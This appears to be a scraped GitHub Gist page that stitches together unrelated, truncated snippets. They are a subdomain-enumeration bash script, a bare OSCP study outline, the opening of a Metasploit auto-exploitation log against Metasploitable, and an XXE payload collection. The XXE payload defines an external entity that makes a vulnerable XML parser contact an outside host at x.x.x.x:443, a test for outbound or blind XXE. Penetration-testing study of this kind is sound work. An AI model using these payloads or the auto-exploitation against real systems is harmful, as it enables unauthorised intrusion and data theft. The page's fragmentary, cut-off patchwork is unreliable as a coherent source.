Skip to content

Instantly share code, notes, and snippets.

@fb11
fb11 / suh.sh
Created September 18, 2019 20:07
sub.sh
#!/bin/bash
#@cihanmehmet tweets, @cihanmehmets
if [[ $# -eq 0 ]] ;
then
echo "Usage: ./sub.sh findname2.com"
exit 1
else
curl 'https://crt.sh/?q=%.'$1'&output=json' | jq '.[] | {name_value}' | sed 's/\"//g' | sed 's/\*\.//g' | sort -u |grep "name_value"|cut -d ' ' -f4 > $1.txt
curl -s "http://web.archive.org/cdx/search/cdx?url=*."$1"/*&output=text&fl=original&collapse=urlkey" |sort| sed -e 's_https*://__' -e "s/\/.*//" -e 's/:.*//' -e 's/^www\.//' | uniq >>$1.txt

How to pass the OSCP

  1. Recon
  2. Find vuln
  3. Exploit
  4. Document it

Recon

Unicornscans in cli, nmap in msfconsole to help store loot in database.

@Sliim
Sliim / resources.out
Last active March 10, 2018 22:02
msf autoscan & autosploit against metasploitable (script output, use `more`, `cat`..)
This file has been truncated, but you can view the full file.
Script started on Sun 28 Aug 2016 04:19:27 PM CEST
[*] Starting the Metasploit Framework console.../
[*] Starting the Metasploit Framework console...-
[*] Starting the Metasploit Framework console...\
[*] starting the Metasploit Framework console...|
[*] STarting the Metasploit Framework console.../
[*] StArting the Metasploit Framework console...-
[*] StaRting the Metasploit Framework console...\
[*] StarTing the Metasploit Framework console...|
@staaldraad
staaldraad / XXE_payloads
Last active October 18, 2025 15:00
XXE Payloads
--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>